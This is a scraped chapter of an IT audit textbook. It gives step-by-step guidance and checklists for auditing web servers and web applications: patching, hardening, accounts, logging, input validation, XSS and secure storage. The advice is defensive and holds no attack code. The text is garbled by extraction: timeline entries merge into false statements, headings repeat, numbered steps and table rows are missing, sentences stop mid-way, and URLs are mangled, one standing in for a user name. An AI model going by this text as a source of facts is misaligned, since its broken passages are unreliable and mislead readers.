It Audit Chapter 8
It Audit Chapter 8
Background
The background of Internet web applications is fascinating because it has come so far in such a short time period. Perl,
widely used for web applications, was created by Larry Wall in 1987, four years before the first web server was installed in
the United States. The rapid development of the Internet is broadly attributed to the need to share information that would
accelerate development across research and later business. Entrepreneurs found new business models in the Internet
and were able to take advantage of people's need to send and receive information instantly.
The pieces that enabled this rapid growth include the web server, the web browser, and the connected web of computer
hosts. Some of the key dates in the development of the web as we know it include
1989: European physicists Tim Berners-Lee and Robert Cailliau in Switzerland come up with the concept of the
Supercomputer Applications (NCSA), creates the first web browser with mass appeal. He later leaves with friends
from NCSA to eventually create Netscape Communications Corp.
1995: Java is born with Sun Microsystems Java 1.0.
1995: Apache is officially released to the public.
1996: Microsoft releases Internet Explorer 3.0, and Netscape releases Navigator 3.0.
2000: Hackers take down major websites and deface thousands of others, finally bringing attention to web
security.
2001:
The Open
Web
Application
Security
Project (OWASP)
is
born
(http://www.owasp.org).
Key Concerns
Web platform
Security of the operating system, physical and network protection to the host
Web server
Key Concerns
Web platform
Security of the operating system, physical and network protection to the host
Web application
There is a wealth of languages and structures for web application development, complicating the audit process. However,
there are also several tools available to help us wade through the mix and determine what needs attention. We will go
through these in the steps below.
Note
The platform portion of the audit is as important as the audit of the web server and the web
applications. Please refer to the Chapters 6 and 7 on auditing Unix or Windows servers for this
portion of the audit.
2. Verify that the web server is fully patched and updated with the latest approved code.
Failure to run adequately patched systems subjects the web server to unnecessary risk of compromise from vulnerabilities
that may have been patched with updated code releases.
How
Every organization has its own patch-management systems and policies. Verify that the web server is running the latest
approved code with the help of the administrator according to the policies and procedures in the environment. Also review
the policies and procedures for appropriate and timely demands for keeping and verifying that systems are up-to-date with
the latest code releases.
3. Determine if the web server should be running additional tools to aid in the protection of the web server.
Web servers often come with additional measures designed to protect them, such as IISLockdown and URLScan. These
tools are recommended often by the vendors or developers. The additional controls put in place by these tools can lower
the overall risk of the server to compromise greatly.
How
Determine through research at the web developer's website and discussions with the web administrator what tools are
available and the additional controls the tools offer for the given increase in administration. These tools might include
validation checking or tools that monitor web server connections. Some tools offer quite a bit of additional protection for
very little additional overhead. In the Microsoft environment, IISLockdown and URLScan should be run on every Window
IIS web server with very few exceptions. Check to see if your organization has procedures governing how to configure
these tools, and verify that they are configured correctly.
Note
IISLockdown is only for IIS 5.x. IIS 6 is already semisecure; you still can install URLScan on IIS 6 to
further harden and reduce functionality. With Windows Server 2003 SP1, the Security Configuration
Wizard provides a way to strip all unnecessary functionality from the IIS so that only components
that are necessary for the web server to fulfill its role in life are installed and/or running.
4 .Verify that unnecessary services or modules are disabled. Running services and modules should be operating under the least privileged
accounts.
Unnecessary services and modules present additional opportunities for malicious attackers and malware.
How
Discuss and verify with the help of the administrator that unnecessary services are disabled and that the running services
are operating under the least privileged account possible. Verify that FTP, SMTP, Telnet, FrontPage Server Extensions,
and NNTP services are disabled if they are not required.
If you are running Apache, only enable modules that are absolutely necessary. Table 8-2 presents a list of modules
considered to be the bare minimum. Question the need for anything else that might be running.
Apache Module
Purpose
httpd core
mod access
mod auth
mod dir
Supports logging
mod mime
Provides support for character set, content encoding, content language, and MIME
types of documents
5 .Verify that only appropriate protocols and ports are allowed to access the web server.
Minimizing the number of protocols and ports allowed to access the web server reduces the number of attack vectors
available to compromise the server.
How
Discuss with the administrator and verify with the administrator's help that only necessary protocols are allowed to access
the server. For example, the TCP/IP stack on the server should be hardened to allow only appropriate protocols, and
NetBIOS and SMB should be disabled on IIS servers. Note any additional controls that may be in place, such as firewall
rules or network access control lists (ACLs) to limit the protocols and ports allowed to access the web server. In general,
only TCP on ports 80 (HTTP) and 443 (SSL) should be allowed to access the web server.
6 .Verify that accounts allowing access to the web server are managed appropriately and hardened with strong passwords.
Inappropriately managed or used accounts could provide easy access to the web server, bypassing other additional
security controls to prevent malicious attacks. This is a large step with a wide scope, covering controls around account
use and management.
How
Discuss with the administrator and verify with the administrator's help that unused accounts are removed from the server
or completely disabled. The administrator's account on Windows servers should be renamed, and all accounts should be
restricted from remote login except for those used for administration.
The root account on Unix flavored hosts (Linux, Solaris, etc) should be strictly controlled and never used for direct remote
administration. Never run Unix web servers such as Apache under the root account. They should be run under a distinct
user and group such as http://www.-apache. Please see Chapter 7 for more information about the root account.
In general, accounts never should be shared among administrators, and administrators never should share their accounts
with users. Strong account and password policies always should be enforced by the server and by the web server
application.
Additional considerations for IIS web servers include ensuring that the IUSR_MACHINE account is disabled if it is not
used by the application. You also should create a custom least-privileged anonymous account if your applications require
anonymous access. Configure a separate anonymous user account for each application if you host multiple web
applications.
7. Ensure that appropriate controls exist for files, directories, and virtual directories.
Inappropriate controls for files and directories used by the web server and the system in general allow attackers access to
more information and tools than should be available. For example, remote administration utilities increase the likelihood of
compromising a web server.
How
Discuss with the administrator and verify with the administrator's assistance that logs and website content are stored on a
nonsystem volume where possible. Verify that files and directories have appropriate permissions, especially those
containing
Website content
Website scripts
Sample applications and virtual directories should be removed. These would include IISSamples, IISAdmin, IISHelp, and
Scripts virtual directories in IIS web servers.
Also verify that anonymous and everyone groups (world permissions) are restricted except where absolutely necessary.
Additionally, no files or directories should be shared out on the system unless necessary.
8. Ensure that the web server has appropriate logging enabled and secured.
Logging auditable events helps administrators to troubleshoot issues. Logging also allows incident response teams to
gather forensic data.
How
Verify with the administrator that key audit trails are kept, such as failed logon attempts. Ideally, these logs should be
relocated and secured away from the same volume as the web server. Log files also should be archived regularly. They
should be analyzed regularly, preferably by an automated tool in largeinformation technology (IT) environments.
10. Verify that unnecessary or unused ISAPI filters are removed from the server.
ISAPI filters are tightly wrapped with the web server and were intended to allow rapid script execution, faster than CGI
scripts. Support for ISAPI is designed into several web servers, but there have been problems with ISAPI in the past.
Unsecured or unused ISAPI filters may present another avenue of attack.
How
Verify with the web administrator that any ISAPI filters installed on the web server are necessary. Unnecessary or
unsecured web filters should be removed from the server.
How
Verify with the help of the administrator that any certificates are used for their intended purpose and have not been
revoked. Certificate data ranges, public key, and metadata all should be valid. If any of these have changed, then consider
the need for a new certificate that reflects your current needs.
Note
Keep in mind that the audience of this book varies greatly in technical abilities, and an
attempt has been made to simplify as much as possible for the majority of the readers. You
may want to visit http://www.owasp.org/index.php/OWASP_Top_Ten_Project to determine
what scope and toolset make sense in your environment.
1 .Verify that all input is validated prior to use by the web server.
Information must be validated before being used by a web application. Failure to validate web requests subjects the web
server to increased risk from attackers attempting to manipulate input data to produce malicious results.
How
Discuss with the web application developer or web administrator the methodology used for input validation for the
application you are testing.
There are several tools that effectively act as a proxy and allow you to see much of the content posted from your client to
the remote web server. One such tool is Paros Proxy, located at http://www.parosproxy.org.
Another method used by professional web testers is to understand the movement of data during a code review. This isn't
something that should be taken lightly because it may be beyond the scope of what you are trying to accomplish. There is
a tradeoff that you as an auditor are going to have to make regarding the amount of effort you put into this versus the cost
of the data you are protecting.
In general, two ways to look at validation methods are negative methods and positive methods. Negative methods focus
on knowing what bad input to filter out based on the known bad. The problem with negative filtering is that we don't know
now what tomorrow's vulnerabilities and input methods will bring. Positive filtering is much more effective and involves
focusing on validating the data based on what they should be. This is similar in approach to a firewall that denies
everything except what should be accepted.
Common items for positive filtering include criteria you might find in a database or other places that accept data. These
include criteria such as
Numeric range
Cached or Insecure
IDs
Many websites use some sort of key or ID stored on the client as a means of determining
what rights the user has on the web server. If the user can guess and create a token, then
he or she may have free reign on the web server.
Forced Browsing
Some websites require certain checks before allowing a user to access content deeper in
the site. If the checks are not enforced, then a user can access the content directly.
Path Traversal
These attacks attempt to backtrack and go around normal permission sets to gain access
to information or files not normally accessible.
File Permissions
Log and configuration files, among others, may have incorrect permissions and be
accessible through the web interface. Correctly setting file permissions also can help in
preventing other attacks.
Clients should not cache sensitive information such as credit card and personal data.
Attackers can take advantage of users' cached data and maliciously reuse this
information.
When a user enters an invalid credential into a login page, don't return which item was incorrect. Show a generic
message instead such as, "Your login information was invalid!"
Never submit login information via a GET request. Always use POST.
Remove dead code and client-side viewable comments from all pages.
Do not depend on client-side validation. Validate input parameters for type and length on the server, using regular
expressions or string functions.
Database queries should use parameterized queries or properly constructed stored procedures.
Database connections should be made created using a lower privileged account. Your application should not log into
the database using sa or dbadmim.
One way to store passwords is to hash passwords in a database or flat file using SHA-256 or greater with a random
salt value for each password.
Prompt the user to close his or her browser to ensure that header authentication information has been flushed.
Note
an
excellent
overview
of
Cross-site scripting (XSS) allows the web application to transport an attack from one user to another end user's browser.
A successful attack can disclose the second end user's session token, attack the local machine, or spoof content to fool
the user. Damaging attacks include the disclosure of end-user files, installation of Trojan horse programs, redirecting the
user to some other page or site, and modifying the presentation of content.
How
Cross-site scripting attacks are very difficult to find, and although tools can help, they are notoriously inept at locating all
the possible combinations of XSS possible on a web application. By far the best method for determining if your website is
vulnerable is by doing a thorough code review with the administrator.
If you were to review the code, you would search for every possible path by which HTTP input could make its way into the
output going to a user's browser. The key method used to protect a web application from XSS attacks is to validate every
header, cookie, query string, form field, and hidden field. Drawing on the previous discussion of positive and negative
validation measures, you should make sure to employ a positive validation method.
CIRT.net contains two tools, Nikto and a Nessus plugin, that you might be able to use to help you automate the task of
looking for XSS vulnerabilities on your web server. Keep in mind that these tools are not as thorough as conducting a
complete code review, but at least they can provide more information to those who don't have the skill set, resources,
time, and dollars to conduct a complete review. Nikto, a tool from http://www.cirt.net/code/nikto.shtml, searches literally
thousands of known issues across hundreds of platforms. It's a powerful tool and should be part of your toolset. Scan
items and plugins are updated frequently and can be updated automatically if desired. Commercial tools also are available
that may help, such as acunetix (http://www.acunetix.com). These tools may find well-known attacks, but they will not be
nearly as good as performing a solid code review.
If you don't have the internal resources available to perform a code review, particularly on a home-grown application, and
you believe that the data on the website warrant a deep review, then consider hiring third-party help. There are outfits
such as FishNet Security (http://www.fishnetsecurity.com) that perform this kind of work.
5 .Verify that the server is updated with all known patches for buffer overflows.
Buffer overflows are quick to find their way into an exploit for web servers in general. You should make sure that all
applicable patches covering buffer overflows are installed on the web server to protect your web applications.
How
Buffer overflows aren't something you typically find by looking through the code unless you are a professional hacker paid
to do this. By far the easiest method to stay on top of buffer overflows is to stay on top of the patching cycle for your
systems. You have patches for the operating system, web platform, and in many cases the web application that you need
to research and verify.
Discuss the patching cycle of the web servers with the web administrator to ensure that any applicable web application
patches have been installed. This sounds like a repeat of step 2 above for the web platform. However, in certain cases,
commercial web applications require their own patches separate from the web platform. Ensure that all known patches
are installed to protect the security of the web platform and web application.
Perform a code review if possible for all calls to external resources to determine if the method could be
compromised.
Commercial tools are available that may help, such as acunetix (http://www.acunetix.com). These tools are
definitely powerful and may find well-known attacks, but they will not be as good as performing a solid code
review.
Consider hiring third-party help if the application is particularly sensitive, you lack the resources, or you need to
verify items such as regulatory compliance.
Error handling is often better controlled if it is centralized as opposed to compartmentalizing it across several interworking
objects or components. If you are reviewing the code, the error handling should flow nicely and show structure. If the error
handling looks haphazard and like an afterthought, then you may want to look much more closely at the application's
ability to handle errors properly.
8. Ensure that secure storage mechanisms are used correctly and appropriately.
Web applications often want to obfuscate or encrypt data to protect the data and credentials. The challenge is that there
are two parts to this scheme: the black box that does the magic and the implementation of the black box into your web
application. These have proven difficult to code properly, frequently resulting in weak protection.
How
Begin the discussion with the web administrator by talking about the sensitivity of the data you want to protect. If the data
are sensitive and not encrypted, then consider whether there are industry or regulatory drivers stating that the data must
be encrypted, and note the issue. If data are encrypted, then discuss in detail with the developer or review documentation
with the administrator to understand how the encryption mechanism was implemented into your web application. Ensure
that the level of encryption is equivalent to the level of data you want to protect. If you have extremely sensitive data such
as credit-card data, then you may want to have actual encryption instead of a simple algorithm that obfuscates the data.
Note
Obfuscation simply means to find creative ways of hiding data without using a key. Encryption is
considered to be much, much more secure than obfuscation. Encryption uses tested algorithms and
unique keys to transform data into a new form in which there is a little or no chance of recreating the
original data without a key. Sound complicated? It's that much harder to defeat properly
implemented encryption than it is to defeat obfuscation.
Security mailing lists for the web server, platform, and application are monitored.
The latest security patches are applied in a routine patch cycle under the guidance of written and agreed-to
policies and procedures.
A security configuration guideline exists for the web servers in the environment and is strictly followed.
Exceptions are carefully documented and maintained.
Regular vulnerability scanning from both internal and external perspectives is conducted to discover new risks
quickly and to test planned changes to the environment.
Regular internal reviews of the server's security configuration are conducted to compare the existing
infrastructure with the configuration guide.
Regular status reports are issued to upper management documenting the overall security posture of the web
servers.
Having a strong server configuration standard is critical to a secure web application. These servers have
many configuration options that affect security and are not secure out of the box. Taking the time to
understand these options and how to configure them to your environment is fundamental to maintaining
sound and secure web servers.
Automated tools can be quite harmful to production environments. Exercise care, and design
Acunetix: http://www.acunetix.com
Web Sleuth: http://www.sandsprite.com/Sleuth
Paros Proxy: http://www.parosproxy.org
Web Inspect: http://www.spidynamics.com/products/webinspect
nikto: /http://www.cirt.net/code/nikto.shtml
XSS NASL plugin for Nessus: http://www.cirt.net/code/nessus.shtml
JMeter: http://www.jakarta.apache.org/jmeter
Knowledge Base
http://www.owasp.org/index.php/OWASP_Top_Ten_Project
CGI security: http://www.cgisecurity.net/
Securing IIS: http://www.microsoft.com/technet/security/prodtech/IIS.mspx
Windows Server 2003 Security Guide: The web server role:
http://www.microsoft..com/technet/security/prodtech/windowsserver2003/w2003hg/s3sgch09.mspx
Story about the history of the World Wide Web from Microsoft's perspective:
http://www.microsoft.com/misc/features/features_flshbk.htm
General story about the history of the World Wide Web:
http://www.computerworld.com/developmenttopics/websitemgmt/story/0,10801,73525,00.html
Master Checklists
Auditing Web Servers
Checklist for Auditing Web Servers
1. Verify that the web server is running on a dedicated system and not in conjunction with other critical
applications.
2. Verify that the web server is fully patched and updated with the latest approved code.
3. Determine if the web server should be running additional tools to aid in the protection of the web server.
4. Verify that unnecessary services or modules are disabled. Running services and modules should be running
with least privileged accounts.
5. Verify that only appropriate protocols and ports are allowed to access the web server.
6. Verify that accounts allowing access to the web server are managed appropriately and hardened with strong
passwords.
7. Ensure that appropriate controls exist for files, directories, and virtual directories.
8. Ensure that the web server has appropriate logging enabled and secured.
9. Ensure that script extensions are mapped appropriately.
10. Verify that unnecessary or unused ISAPI filters are removed from the server.
11. Verify the validity and use of any server certificates in use.
Auditing Web Applications
Checklist for Auditing Web Applications
1. Verify that all input is validated prior to use by the web server.
2. Verify that proper authorization controls are enforced.
3. Broken authentication and session management
4. Review the website for cross-site scripting vulnerabilities.
5. Verify that the server is updated with all known patches for buffer overflows.
6. Ensure that the web application is protected against injection attacks.
7. Evaluate the use of proper error handling.
8. Ensure that secure storage mechanisms are used correctly and appropriately.
9. Determine the use of adequate controls to prevent denial of service.
10. Review controls surrounding maintaining a secure configuration.